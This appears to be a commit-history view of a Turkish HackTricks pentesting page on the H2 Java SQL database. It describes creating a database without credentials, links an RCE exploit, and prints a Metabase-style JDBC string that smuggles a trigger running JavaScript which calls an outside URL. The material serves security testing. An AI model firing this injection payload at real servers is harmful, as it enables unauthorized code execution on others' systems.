hacktricks/network-services-pentesting/pentesting-web/h2-java-sql-database.md

61 lines
3.8 KiB
Markdown
Raw Normal View History

2024-02-10 18:14:16 +00:00
# H2 - Java SQL veritabanı
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>AWS hacklemeyi sıfırdan ileri seviyeye öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile</strong></summary>
2022-04-28 16:01:33 +00:00
HackTricks'ı desteklemenin diğer yolları:
2023-12-31 01:24:39 +00:00
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
2024-02-10 18:14:16 +00:00
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
2022-04-28 16:01:33 +00:00
</details>
2024-02-10 18:14:16 +00:00
Resmi sayfa: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)
2024-02-10 18:14:16 +00:00
## Erişim
**Geçerli kimlik bilgileri olmadan yeni bir veritabanı oluşturmak** için **mevcut olmayan bir veritabanı adı** belirtebilirsiniz (**kimlik doğrulamasız**):
![](<../../.gitbook/assets/image (128).png>)
Ya da örneğin bir **mysql çalıştığını** ve o veritabanı için **veritabanı adını** ve **kimlik bilgilerini** bildiğinizi biliyorsanız, doğrudan erişebilirsiniz:
![](<../../.gitbook/assets/image (198).png>)
2024-02-10 18:14:16 +00:00
_**HTB'nin Hawk kutusundan bir hile.**_
2022-04-28 16:01:33 +00:00
## **Uzaktan Kod Çalıştırma (RCE)**
2022-08-16 09:29:34 +00:00
H2 veritabanıyla iletişim kurma erişiminiz varsa, RCE almak için bu açığı kontrol edin: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)
2022-04-28 16:01:33 +00:00
2024-02-10 18:14:16 +00:00
## H2 SQL Injection ile RCE
2022-04-28 16:01:33 +00:00
Bu [**gönderide**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) bir payload, **SQL Injection**'ı istismar ederek **H2 veritabanı üzerinden RCE almayı**ıklar.
```json
[...]
"details":
2024-02-10 18:14:16 +00:00
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
```
<details>
2022-04-28 16:01:33 +00:00
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
HackTricks'ı desteklemenin diğer yolları:
2023-12-31 01:24:39 +00:00
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
2022-04-28 16:01:33 +00:00
</details>